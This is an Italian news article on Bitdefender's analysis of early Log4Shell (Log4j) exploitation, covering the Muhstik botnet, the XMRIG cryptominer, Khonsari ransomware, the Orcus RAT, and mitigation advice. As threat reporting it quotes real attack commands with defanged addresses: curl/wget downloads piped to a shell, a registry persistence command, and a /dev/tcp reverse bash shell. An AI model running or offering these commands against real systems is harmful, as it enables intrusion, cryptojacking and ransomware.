Bitdefender

Ecco gli attacchi Log4Shell: mirano a criptovalute, ransomware e trojan

Si rilevano i primi tentativi di exploit Log4Shell della vulnerabilità Java Log4j Apache. Una prima analisi approfondita di come funzionano questi attacchi e le finalità arriva oggi da BitDefender, in uno studio

14 Dic 2021

In queste ore vari ricercatori stanno rilevando i primi tentativi di exploit Log4Shell della vulnerabilità Java Log4j Apache. Una prima analisi approfondita di come funzionano questi attacchi e a quali fini arriva oggi da BitDefender, in uno studio.

“Ottenere un accesso iniziale tramite l’exploit seguito dal cryptojacking (estrazione malevola di criptovalute senza la conoscenza e il consenso del proprietario), sembra essere la motivazione principale per gli attori delle minacce in questa fase iniziale di sfruttamento”, si legge.

Le seguenti rilevazioni sono basate sulla telemetria di Bitdefender da centinaia di milioni di sensori globali e non sono basate su dati provenienti da honeypots o dal monitoraggio del traffico nelle reti botnet.

Muhstik Botnet per sfruttare vulnerabilità Log4J

A quanto riporta lo studio, diverse botnet stanno già sfruttando questa vulnerabilità. Le botnet stanno prendendo di mira i server per distribuire backdoor, espandere la loro rete botnet (con server Internet ben connessi) e distribuire cryptominer. L’attacco su larga scala è fondamentale per il successo di questi operatori di botnet.

WHITEPAPER
Perché impostare una strategia di manutenzione dei server?
Datacenter
Sicurezza

Vulnerabilità Log4Shell: tutti i dettagli e come mitigare il rischio

“Nella nostra telemetria, abbiamo identificato Muhstik botnet come uno dei primi adottanti”, si legge.

Il file di classe maligno hxxp://45.130.229[.]168:9999/Exploit.class viene utilizzato dagli attaccanti per eseguire il comando

curl hxxp://18.228.7[.]109/.log/log | sh. Lo script di shell cerca poi di scaricare più file ELF (Executable and Linkable Format) e script di shell per poi eseguirli.

Lo scopo di questi script è quello di installare la botnet Muhstik e distribuire un cryptominer.

5

Uso di Muhstik botnet

Questi file vengono rilevati come:

GenericKD.47627843

Gen:Variant.Trojan.Linux.Gafgyt.22

Linux.Zojfor.A.

Il file di classe viene rilevato come:

GenericKD.47627832

XMRIG miner

“Abbiamo anche rilevato gli attori della minaccia che cercano di distribuire il miner XMRIG. Questo viene attivato tramite il rilevamento di anomalie in Bitdefender EDR quando viene avviato un nuovo sottoprocesso sospetto”:

6-2

Anomaly detected in Bitdefender EDR

Questo processo esegue la riga di comando cmd /C “(curl -s hxxp://158.247.218[.]44:8000/wsnbb.sh||wget -q -O- hxxp://154.247.218[.]44:8000/wsnbb.sh) | bash, which downloads the script file wsnbb.sh.

Questo script tenta poi di distribuire il miner XMRIG da GitHub:

7

Questo comportamento viene rilevato da Bitdefender EDR come:

NotExists.1.Process.NewSubprocessesStarted

Il XMRIG miner è rilevato come:

  • Gen:Variant.Application.Linux.Miner.3 (Linux)
  • Gen:Variant.Application.Miner.2 (Windows)

Application.MAC.Generic.194 (macOS)

Nuova famiglia Ransomware Khonsari

“Mentre la maggior parte degli attacchi osservati finora sembra prendere di mira i server Linux, abbiamo anche visto attacchi contro sistemi che eseguono il sistema operativo Windows. Per questi attacchi, abbiamo rilevato il tentativo di distribuire una famiglia di ransomware chiamata Khonsari”, si legge.

Questo tentativo di sfruttare la vulnerabilità Log4j utilizza la classe maligna hxxp://3.145.115[.]94/Main.class per scaricare un payload aggiuntivo. Domenica 11 dicembre, Bitdefender ha osservato questo payload come un file binario .NET dannoso scaricato da hxxp://3.145.115[.]94/zambo/groenhuyzen.exe. Si tratta di una nuova famiglia di ransomware, chiamata Khonsari dopo l’estensione utilizzata sui file crittografati.

Una volta eseguito, il file maligno elencherà tutte le unità e le cripterà interamente, tranne l’unità C:. Sull’unità C:, Khonsari cripterà solo le seguenti cartelle:

C:Users<user>Documents

C:Users<user>Video

C:Users<utente>Immagini

C:Userscode(0144)/Downloads

C:Users<user>Desktop

I file con estensione .ini e .lnk sono ignorati. L’algoritmo usato per la crittografia è AES 128 CBC usando PaddingMode.Zeros. Dopo la crittografia, l’estensione .khonsari viene aggiunta ad ogni file.

Una nota di riscatto viene scritta in C:Users<user>DesktopHOW TO GET YOUR FILES BACK.TXT e aperta con Notepad:

Your files have been encrypted and stolen by the Khonsari family.If you wish to decrypt , call (225) 287-1309 or email karenkhonsari@gmail.com.If you do not know how to buy btc, use a search engine to find exchanges.DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.

“C’è anche una richiesta GET a hxxp://3.145.115[.]94/zambos_caldo_de_p.txt. La risposta non viene utilizzata nel codice binario, e la nostra ipotesi è che la richiesta GET venga eseguita per scopi di registrazione e monitoraggio”.

Il ransomware viene rilevato come:

  • GenericKD.47628589.

Il file di classe viene rilevato come:

  • GenericKD.38253445.

Trojan di accesso remoto Orcus

Un ulteriore tentativo di scaricare nuovi payload è stato osservato da Bitdefender lunedì 13 dicembre, utilizzando lo stesso URL hxxp://3.145.115[.]94/Main.class. Questa volta, però, Main.class tenta di scaricare il nuovo payload da hxxp://test.verble[.]rocks/dorflersaladreviews.jar.

Il file .jar viene copiato in C:Users<user>AppDataLocalAdobefengchenteamchina.class e la persistenza viene impostata usando il comando

reg.exe add “hkcusoftwaremicrosoftwindowscurrentversionrun” /v “adobe telemetry agent” /t reg_sz /f /d “c:program files (x86)common filesoraclejavajavapathjavaw.exe -jar c:users<user>appdatalocaladobefengchenteamchina.class peedee”

Scarica lo shellcode da hxxp://test.verble.rocks/dorflersaladreviews.bin.encrypted e lo inietta nella memoria del processo conhost.exe. Qui, lo shellcode decifra e carica in memoria un altro payload maligno, che sembra essere il trojan (RAT) Orcus Remote Access che si connette al server di comando e controllo test.verble[.]rocks.

Il file di classe viene rilevato come:

GenericKD.38268017

Il file .jar viene rilevato come:

GenericKD.38267576

Lo shellcode viene rilevato come:

Agent.FQSI

DonutLoader.A

Orcus RAT è stato rilevato come:

Gen:Variant.MSILPerseus.207255

Shell Bash inversa

“Guadagnare un punto d’appoggio per un successivo sfruttamento è una tendenza che stiamo vedendo dopo gli exploit 0-day. Distribuire una shell inversa su questi server vulnerabili è una semplice azione che può essere seguita in seguito da un attacco su larga scala.

In uno degli attacchi che abbiamo visto, il file di classe maligno hxxp://152.32.216[.]78/Exploit.class viene utilizzato per eseguire la seguente riga di comando”, si legge nello studio:

8

Il comando decrittato è l’esecuzione della seguente linea di comando. Il risultato di questo comando è la creazione di una shell bash inversa.

/bin/bash -i > /dev/tcp/152.32.216[.]78/7777 0<&1 2>&1

La semplicità di questo attacco dimostra quanto sia facile armare la vulnerabilità Log4j.

Questo comportamento è stato rilevato da Bitdefender EDR come:

BashReverseShell

Il file di classe viene rilevato come:

GenericKD.47629137

Come rimediare a Log4Shell/Log4J, consigli Bitdefender

Bitdefender consiglia vivamente ai propri clienti di intraprendere un’azione immediata e di implementare tutte le patch esistenti e le misure di mitigazione consigliate dai fornitori del settore.

Scansione completa infrastruttura e supply chain

Si consiglia di condurre una verifica completa dell’infrastruttura e delle applicazioni software per identificare tutti i sistemi che implementano il framework di registrazione Apache Log4j2. Quindi, aggiornare immediatamente queste implementazioni a Log4j versione 2.15.0, che non è vulnerabile, o implementare le mitigazioni di configurazione raccomandate da Apache, maggiori dettagli in questo articolo.

“Riesaminate la vostra catena di fornitura del software e la distinta base del software. Cercate contromisure di mitigazione o patch dai manutentori di progetti software open-source o dai produttori di software commerciale per tutti i sistemi interessati. Questo è particolarmente vero per il software che state eseguendo su sistemi che si affacciano su Internet, ma non dovrebbe essere limitato a tali sistemi a causa della minaccia di attacco laterale posta dalla gravità di questa vulnerabilità”.

Implementare un approccio di difesa in profondità

Al momento, gli attacchi consistono in più fasi, dando al team di sicurezza una buona opportunità per evitare che un incidente di sicurezza si evolva in una violazione della sicurezza.

“Nella nostra telemetria, abbiamo visto vari moduli che impediscono lo sfruttamento, dalla protezione a livello di rete (reputazione URL/IP), all’antimalware statico (rilevando il miner o il payload dannoso noto) all’Advanced Threat Defense per rilevare il comportamento sospetto dei processi”.

Si consiglia insomma di monitorare attivamente l’infrastruttura per potenziali tentativi di sfruttamento e rispondere di conseguenza. 

“È importante notare che questa è una situazione altamente dinamica e molti fornitori di software e progetti open-source stanno ancora indagando sulla presenza di Log4j2 nei loro software con ulteriori avvisi previsti nei prossimi giorni e settimane. Pertanto, monitorare da vicino gli aggiornamenti dei fornitori dovrebbe essere una parte fondamentale dei vostri sforzi di mitigazione in corso”, si legge nello studio.

WHITEPAPER
CYBERSECURITY: le migliori strategie per la tutela e la continuità dei servizi IT
Sicurezza
Cybersecurity
@RIPRODUZIONE RISERVATA

Speciale PNRR

Tutti
Incentivi
Salute digitale
Formazione
Analisi
Sostenibilità
PA
Sostemibilità
Sicurezza
Digital Economy
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr